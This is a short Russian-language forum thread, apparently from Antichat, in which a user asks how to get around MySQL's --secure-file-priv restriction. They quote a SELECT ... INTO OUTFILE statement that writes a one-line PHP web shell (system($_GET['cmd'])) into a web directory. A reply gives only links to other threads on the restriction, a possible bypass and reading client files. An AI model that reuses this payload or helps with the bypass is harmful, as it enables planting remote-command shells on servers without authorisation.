Вопрос о --secure-file-priv

Discussion in 'Песочница' started by polzunki, 4 Feb 2021.

  1. polzunki

    polzunki New Member

    Joined:
    28 Jul 2020
    Messages:
    29
    Likes Received:
    0
    Reputations:
    0
    Доброго времени. Просьба подсказать по такому вопросу. Имею доступ к записи данных в бд.
    При попытке импортировать .sql файл с таким содержимым в базу:

    Code:
    select '<?php system($_GET["cmd"]); ?>' into outfile '/home/www/ .... /shell.php'
    Получаю:

    Code:
     Error: The MySQL server is running with the --secure-file-priv option so it cannot execute this statement
    Возможно ли это как-то обойти? Если да, то каким образом?
     
  2. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    603
    Likes Received:
    1,193
    Reputations:
    391
    Доброго. Без указания используемого программного обеспечения и самое главное, версий, трудно что либо ответить однозначно. Поэтому предлагаю ознакомиться самомстоятельно.

    По поводу secure-file-priv:
    https://antichat.com/threads/453986/#post-4114489

    Возможный обход (#flag 5):
    https://antichat.com/threads/469355/page-3#post-4299433

    Так же, кейс может попасть под возможность почитать клинтские файлы:
    https://antichat.com/threads/469196/
     
    dmax0fw, Suicide, fandor9 and 3 others like this.
Loading...